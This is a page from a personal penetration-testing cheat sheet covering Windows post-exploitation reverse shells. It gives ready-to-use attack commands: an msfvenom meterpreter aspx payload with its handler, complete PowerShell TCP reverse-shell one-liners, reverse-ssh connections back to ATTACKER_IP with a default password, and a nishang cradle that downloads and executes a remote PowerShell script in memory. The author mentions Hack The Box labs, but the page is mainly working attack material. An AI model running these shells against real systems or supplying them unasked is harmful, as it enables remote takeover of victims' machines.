Leet Sheet
  • Leet Sheet
  • TODO
  • Reconnaissance
    • Automated Reconnaissance
    • Domains
    • Scour the Web
    • Metadata
  • Web App Hacking
    • Enumeration
      • Webserver Virtualhost Subdomains
      • Common Identifiers
      • Web Fuzzing
      • Directory Enumeration
        • Automated Directory Enumeration
        • Manual Directory Enumeration
      • Automated Web Technology Detection
    • User Attacks
      • CORS Misconfigurations
      • DNS Rebinding
      • Open Redirect
      • Clickjacking
      • Cross Site Request Forgery (CSRF)
      • Session Fixation
      • XSS/Cross Site Scripting
      • CSS Injection
      • HTML Injection
      • Phishing
    • Database Attacks
      • SQL Injection
      • Get a Shell From DB Connection
    • Server Attacks
      • Collisions
      • Server Side Request Forgery
        • Redis SSRF
      • Insecure Direct Object Reference
      • Timing-Based Side-Channel Attacks
      • Attacking Authentication Methods
        • JWT Attacks
        • Brute Forcing Web Forms
      • Loose Comparisons
      • Unrestricted File Upload
      • Insecure Deserialization
      • Command Injection
      • Path Traversal
      • File Inclusion
      • Server-Side Template Injection
      • XML External Entities Injection (XXE)
      • Server Misconfigurations
      • Parser Inconsistencies
      • Bypassing WAFs
    • DNS Attacks
    • Cloud Attacks
      • Amazon Web Services
    • Interesting Outdated Attacks
      • SQL Truncation
  • Network Hacking
    • General Enumeration
    • RPC
    • LDAP
    • SMB
    • SNMP
    • WMI
    • SSH
    • Kerberos
    • NTLM
    • Man-In-the-Middle (MITM)
    • WinRM
  • Post Exploitation
    • Windows
      • CLI Tips
      • Shells
      • Windows Script Host
      • Windows Privilege Escalation
        • Enumeration
        • JuicyPotato/RottenPotato
        • Kernel Exploits
        • Unquoted Service Paths
      • Active Directory
      • Dumping Passwords
      • NTLM Hash Theft
    • Linux
      • Port Forwarding
      • Shells
      • Linux Privilege Escalation
        • Enumeration
        • SUID Bit
        • Dot (.) In PATH
        • Escape From Restricted Shell
        • Symlink Trickery
        • Wildcard Injection
        • Docker group/LXD group
        • Password Reuse
      • Backdoors
    • Docker Container
    • General
  • Various
    • CVEs
    • SSH Agent Hijacking
    • Password Cracking
    • Cryptography
    • Non-Hacking
    • Malware
    • Forensics
      • Reading Keystrokes from USB PCAP Data
  • Binary Exploitation
    • Resources
    • Base Knowledge
    • Format String Exploits
    • Stack Smashing
    • Heap Exploits
    • Time-of-Check to Time-of-Use (TOCTOU)
    • Shellcode
    • Decompilation
    • Debugging
    • Exploit Mitigations and Protections
    • Exploit Protection Bypassing
    • Passing Input
    • Fuzzing
    • Automatic Exploitation
  • Physical Security
    • Mechanical Locks
    • Electronic Locks
    • Other Attacks
    • Destructive Entry
    • Elevator Attacks
  • Social Engineering
    • Phishing
Powered by GitBook
On this page
  • Normal Shells
  • Meterpreter
  • Interactive Powershell Reverse Shell
  • Full TTY Shells
  • Pwncat
  • Reverse SSH Shell
  • Rlwrap with nishang
  • Socat

Was this helpful?

  1. Post Exploitation
  2. Windows

Shells

PreviousCLI TipsNextWindows Script Host

Last updated 2 years ago

Was this helpful?

Normal Shells

Meterpreter

First, generate the file which, when executed, starts a reverse shell on the targeted host. Here's an example of an aspx shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.14.73" LPORT=4444 -f aspx -o reverse.aspx

Then, in your attacker machine, run Metasploit and start a handler:

msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set LPORT 4444 
set LHOST 10.10.14.73 
run

Replace the port and IP address with your own ones, of course.

Interactive Powershell Reverse Shell

Caveat: stderr doesn't work!

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('IP_ADDRESS_HERE', PORT_NUMBER_HERE);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Full TTY Shells

Pwncat

Caveat: I've tested it on 2 Windows boxes in HTB, and it didn't work in either one.

Probably a good idea to switch to bash if using ZSH:

exec bash --login

If your target machine doesn't have internet access, then you'll need to download the plugins first:

pwncat --download-plugins

Listen on port 4444:

pwncat -m windows -lp 4444

Then connect to the pwncat with either a powershell.exe or cmd.exe reverse shell:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Reverse SSH Shell

Features:

  • Full TTY shell

  • File sharing via SFTP

  • Port forwarding

  • At least Windows 7 or Windows server 2008 (Windows 10 for conpty, need workaround for lower windows versions for full TTY functionality)

  • Linux kernel version 2.6.23 and higher

Caveats:

  • SCP doesn't seem to work

  • SSH port forwarding doesn't seem to work

  • It hangs sometimes

Evades antivirus: Don't know

First run this on your machine:

./reverse-ssh -v -l :4444

Then the following on the victim machine (you can use the upx packed executable, use ssh-shellhost on older machines):

.\upx_reverse-sshx86.exe -p 4444 kali@ATTACKER_IP

And finally on your machine:

ssh -p 8888 127.0.0.1

The default password is letmeinbrudipls

NB! If the target doesn't have conpty (pre-windows 10, build 17763), then you need the following workaround:

upx_reverse-sshx86.exe -p 4444 -s ssh-shellhost.exe kali@ATTACKER_IP

Rlwrap with nishang

Serve the script on your machine. Then download the nishang shell to memory:

powershell iex (New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1');

Then run the reverse shell.

Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port SOME_PORT

Socat

I think socat can be used to make a decent reverse shell?

:

The shellhost.exe executable needs to be in the same directory. It's an executable from .

Start a listener on SOME_PORT on the attacker machine. Use as explained here (not tested).

Requirements
OpenSSH
rlwrap
LogoFull TTYsHackTricks
LogoSocat - How to create a windows reverse shellStack Overflow
LogoGitHub - Fahrj/reverse-ssh: Statically-linked ssh server with reverse shell functionality for CTFs and suchGitHub
LogoShells - WindowsHackTricks
LogoShells - WindowsHackTricks